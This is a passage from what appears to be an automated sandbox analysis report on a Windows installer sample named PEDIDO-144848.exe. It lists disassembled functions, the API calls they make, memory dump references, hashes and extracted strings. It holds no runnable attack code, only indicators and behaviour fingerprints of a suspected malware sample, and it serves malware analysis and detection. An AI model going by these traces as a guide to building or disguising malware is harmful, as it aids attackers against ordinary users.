                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 5103c2e833fb6cec983ac643f83c5405fcf5b56718913b7927d61a5481dde75b
                                                        • Instruction ID: a8a1054ff6e124a16992140d9831d4e67a861e682019e3b6a28de944f62df8e5
                                                        • Opcode Fuzzy Hash: 5103c2e833fb6cec983ac643f83c5405fcf5b56718913b7927d61a5481dde75b
                                                        • Instruction Fuzzy Hash: B5D05E73B141519BD750EBB8BAC445E77E4EB403257304837E502E2091E67989429618
                                                        Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: AllocGlobal
                                                        • String ID:
                                                        • API String ID: 3761449716-0
                                                        • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                        • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                                        • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                        • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

                                                        Non-executed Functions

                                                        Function 004050F7 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 00405156
                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405165
                                                        • GetClientRect.USER32(?,?), ref: 004051A2
                                                        • GetSystemMetrics.USER32(00000002), ref: 004051A9
                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004051CA
                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051DB
                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 004051EE
                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 004051FC
                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040520F
                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405231
                                                        • ShowWindow.USER32(?,00000008), ref: 00405245
                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405266
                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405276
                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040528F
                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040529B
                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405174
                                                          • Part of subcall function 00403FBA: SendMessageA.USER32(00000028,?,?,00403DEB), ref: 00403FC8
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052B7
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000508B,00000000), ref: 004052C5
                                                        • CloseHandle.KERNEL32(00000000), ref: 004052CC
                                                        • ShowWindow.USER32(00000000), ref: 004052EF
                                                        • ShowWindow.USER32(?,00000008), ref: 004052F6
                                                        • ShowWindow.USER32(00000008), ref: 0040533C
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                        • CreatePopupMenu.USER32 ref: 00405381
                                                        • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 00405396
                                                        • GetWindowRect.USER32(?,000000FF), ref: 004053B6
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053CF
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040540B
                                                        • OpenClipboard.USER32(00000000), ref: 0040541B
                                                        • EmptyClipboard.USER32 ref: 00405421
                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 0040542A
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405434
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405448
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405461
                                                        • SetClipboardData.USER32(?,00000000), ref: 0040546C
                                                        • CloseClipboard.USER32 ref: 00405472
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                        • String ID: @y
                                                        • API String ID: 590372296-2793234042
                                                        • Opcode ID: fb478b241302d14890c8e569f688314f17ac97b328ad1953f1dfc7460e5c88c7
                                                        • Instruction ID: 669047f9f67e304dd712f5be3c8e464dbcc99e7ae4a165c688d328355b6db051
                                                        • Opcode Fuzzy Hash: fb478b241302d14890c8e569f688314f17ac97b328ad1953f1dfc7460e5c88c7
                                                        • Instruction Fuzzy Hash: 9DA16970900249BFEF119FA0DD89EAE7F79EB08354F00806AFA05B61A0C7795E50DF69
                                                        Function 00404936 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 0040494E
                                                        • GetDlgItem.USER32(?,00000408), ref: 00404959
                                                        • GlobalAlloc.KERNEL32(00000040,00000002), ref: 004049A3
                                                        • LoadBitmapA.USER32(0000006E), ref: 004049B6
                                                        • SetWindowLongA.USER32(?,000000FC,00404F2D), ref: 004049CF
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049E3
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004049F5
                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404A0B
                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A17
                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A29
                                                        • DeleteObject.GDI32(00000000), ref: 00404A2C
                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A57
                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A63
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AF8
                                                        • SendMessageA.USER32(?,0000110A,?,00000000), ref: 00404B23
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B37
                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404B66
                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B74
                                                        • ShowWindow.USER32(?,00000005), ref: 00404B85
                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C82
                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CE7
                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404CFC
                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D20
                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D40
                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D55
                                                        • GlobalFree.KERNEL32(?), ref: 00404D65
                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DDE
                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404E87
                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E96
                                                        • InvalidateRect.USER32(?,00000000,?), ref: 00404EB6
                                                        • ShowWindow.USER32(?,00000000), ref: 00404F04
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F0F
                                                        • ShowWindow.USER32(00000000), ref: 00404F16
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 1638840714-813528018
                                                        • Opcode ID: 56b3b82b533b733a33c13492c2ad1bc1f2630ac234a6e512c7e667a37d25cb4c
                                                        • Instruction ID: 10d6cb261f95093856db0383de4589f8155b4d68da151c8c89fd000e0678f767
                                                        • Opcode Fuzzy Hash: 56b3b82b533b733a33c13492c2ad1bc1f2630ac234a6e512c7e667a37d25cb4c
                                                        • Instruction Fuzzy Hash: AB027CB0900209AFEB14DF64DC85AAE7BB9FB84314F10817AF610BA2E1D7789D51CF58
                                                        Function 004043C3 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404412
                                                        • SetWindowTextA.USER32(00000000,?), ref: 0040443C
                                                        • SHBrowseForFolderA.SHELL32(?,0079D918,?), ref: 004044ED
                                                        • CoTaskMemFree.OLE32(00000000), ref: 004044F8
                                                        • lstrcmpiA.KERNEL32(Call,0079E540), ref: 0040452A
                                                        • lstrcatA.KERNEL32(?,Call), ref: 00404536
                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404548
                                                          • Part of subcall function 0040557A: GetDlgItemTextA.USER32(?,?,00000400,0040457F), ref: 0040558D
                                                          • Part of subcall function 0040600B: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PEDIDO-144848.exe",758B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406063
                                                          • Part of subcall function 0040600B: CharNextA.USER32(?,?,?,00000000), ref: 00406070
                                                          • Part of subcall function 0040600B: CharNextA.USER32(?,"C:\Users\user\Desktop\PEDIDO-144848.exe",758B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406075
                                                          • Part of subcall function 0040600B: CharPrevA.USER32(?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406085
                                                        • GetDiskFreeSpaceA.KERNEL32(0079D510,?,?,0000040F,?,0079D510,0079D510,?,?,0079D510,?,?,000003FB,?), ref: 00404606
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404621
                                                          • Part of subcall function 0040477A: lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404695,000000DF,00000000,00000400,?), ref: 00404818
                                                          • Part of subcall function 0040477A: wsprintfA.USER32 ref: 00404820
                                                          • Part of subcall function 0040477A: SetDlgItemTextA.USER32(?,0079E540), ref: 00404833
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: @y$A$C:\Users\user\slavelivets$Call
                                                        • API String ID: 2624150263-2138057794
                                                        • Opcode ID: 3d12c395db0b8a5e031a22e6692dd266f1d5deac6801d88cb2d33c24727f66a7
                                                        • Instruction ID: b79cf5757fdebc40129ea8bf430174fd55c22843b8008fc959c2d10819856cf3
                                                        • Opcode Fuzzy Hash: 3d12c395db0b8a5e031a22e6692dd266f1d5deac6801d88cb2d33c24727f66a7
                                                        • Instruction Fuzzy Hash: A3A170B1900209ABDB11EFA5CC45BAF77B8EF85314F10843BF611B62D1E77C9A418B69
                                                        Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                        • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                                                        • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                        • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                        • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                        • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                        • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                        • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                        • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                        • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$lstrcpy$Alloc
                                                        • String ID:
                                                        • API String ID: 4227406936-0
                                                        • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                        • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                        • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                        • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                        Function 004020CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoCreateInstance.OLE32(00407408,?,?,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214C
                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
                                                        Strings
                                                        • C:\Users\user\slavelivets, xrefs: 0040218C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                        • String ID: C:\Users\user\slavelivets
                                                        • API String ID: 123533781-1403250623
                                                        • Opcode ID: 9afc873253917f5f4e985fd398202ffa23981bb55cb45aee65fcfdfca240a494
                                                        • Instruction ID: 3b959fe0d73b6f2ff8ba1a3dad26e84ad0429d5bc67268e837327fa781b0949d
                                                        • Opcode Fuzzy Hash: 9afc873253917f5f4e985fd398202ffa23981bb55cb45aee65fcfdfca240a494
                                                        • Instruction Fuzzy Hash: 705116B5E00208BFCB00DFE4C988A9DBBB6EF48314B2445AAF515FB2D1DA799941CB54
                                                        Function 0040270B Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040271A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: fce0c61a2aa14f88a491396f2313ca711f415b7b1927e6be8b43a2417c2e171c
                                                        • Instruction ID: 3ccff3199aeab2db1e2dd923352da36f4292fa18247536f83ce369c7762b159a
                                                        • Opcode Fuzzy Hash: fce0c61a2aa14f88a491396f2313ca711f415b7b1927e6be8b43a2417c2e171c
                                                        • Instruction Fuzzy Hash: 76F05572604110EFD700EBA49A089FEB768DF15324FA0407BF181F20C0CBBC8A429B2A
                                                        Function 00403AB2 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AEE
                                                        • ShowWindow.USER32(?), ref: 00403B0B
                                                        • DestroyWindow.USER32 ref: 00403B1F
                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B3B
                                                        • GetDlgItem.USER32(?,?), ref: 00403B5C
                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B70
                                                        • IsWindowEnabled.USER32(00000000), ref: 00403B77
                                                        • GetDlgItem.USER32(?,?), ref: 00403C25
                                                        • GetDlgItem.USER32(?,00000002), ref: 00403C2F
                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403C49
                                                        • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403C9A
                                                        • GetDlgItem.USER32(?,?), ref: 00403D40
                                                        • ShowWindow.USER32(00000000,?), ref: 00403D61
                                                        • EnableWindow.USER32(?,?), ref: 00403D73
                                                        • EnableWindow.USER32(?,?), ref: 00403D8E
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403DA4
                                                        • EnableMenuItem.USER32(00000000), ref: 00403DAB
                                                        • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403DC3
                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403DD6
                                                        • lstrlenA.KERNEL32(0079E540,?,0079E540,Rse Setup), ref: 00403DFF
                                                        • SetWindowTextA.USER32(?,0079E540), ref: 00403E0E
                                                        • ShowWindow.USER32(?,0000000A), ref: 00403F42
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
